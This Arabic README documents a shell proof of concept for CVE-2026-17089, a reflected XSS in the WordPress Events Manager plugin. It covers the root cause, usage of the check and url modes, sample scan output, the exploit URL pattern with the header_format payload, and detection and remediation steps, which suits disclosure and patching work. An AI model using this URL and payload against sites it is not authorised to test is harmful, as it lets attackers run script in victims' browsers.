Shell PoC لـ CVE-2026-17089، وهو XSS منعكس غير مُصادَق عليه في إضافة WordPress Events Manager (<= 7.4.0.1)؛ يقوم ببصمة الإضافة واختبار انعكاس header_format.
<= 7.4.0.1 — XSS منعكس غير مُصادَق عليه (header_format)المؤلف: pwnVader · الترخيص: MIT (جذر المستودع)
| المكوّن | Events Manager – Calendar, Bookings, Tickets, and more! (إضافة WordPress) |
| النوع | CWE-79 — Cross-Site Scripting منعكس |
| المتأثر | <= 7.4.0.1 |
| تم الإصلاح | إصدار لاحق من 7.4.x (تم تطبيق wp_kses_post() في EM_Events::output_grouped()) |
| CVE | CVE-2026-17089 — CVSS 3.1 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) |
| PoC | poc.sh |
تُنقّي نقطة دخول الـ shortcode قيمة header_format باستخدام wp_kses()، لكن إجراء AJAX
غير المُصادَق عليه search_events_grouped يتجاوز هذا التنقية ويُعيد إخراج القيمة في
استجابة HTML (EM_Events::output_grouped()). يمكن لمهاجم عن بُعد غير مُصادَق عليه إنشاء رابط URL
يُنفّذ JavaScript عشوائيًا في أصل الموقع المتأثر لأي مستخدم يفتحه
(UI:R).
# Interactive menu
./poc.sh
# Read-only: fingerprint the plugin and test the unescaped reflection
./poc.sh check --target https://example.com
# Print the exploit URL (open it in a browser; the script runs in the target origin)
./poc.sh url --target https://example.com --payload "alert(document.domain)"
check)== CVE-2026-17089 PoC (check) ==
target: https://example.com
[1] Plugin fingerprint (read-only)
[PASS] Events Manager assets are served (plugin installed)
[info] Stable tag: 7.1.7
[PASS] version 7.1.7 is in the affected range (<= 7.4.0.1)
[2] Unauthenticated reflection test (read-only, benign marker)
[PASS] endpoint reflected header_format UNESCAPED (the raw is in the response)
== RESULT: 3 PASS / 0 FAIL ==
VULNERABLE to CVE-2026-17089 (unauthenticated reflected XSS).
https://example.com/wp-admin/admin-ajax.php?action=search_events_grouped&scope=all&limit=5&header_format=<urlencoded payload>
readme.txt (Stable tag) و/أو مسار أصول الإضافة
/wp-content/plugins/events-manager/includes/js/events-manager.js.admin-ajax.php?action=search_events_grouped مع ضبط header_format على العلامة والتحقق
مما إذا كان الترميز الخام منعكسًا دون تهريب في جسم الاستجابة.wp_kses_post() على
header_format داخل دالة العرض، مما يغطي كل المستدعين).search_events_grouped أو تصفية
header_format على مستوى WAF/التطبيق.لاختبارات الأمان المُصرّح بها فقط. الـ PoC للقراءة فقط (check) أو يطبع رابط URL (url)؛ لا
يتم تعديل أي بيانات.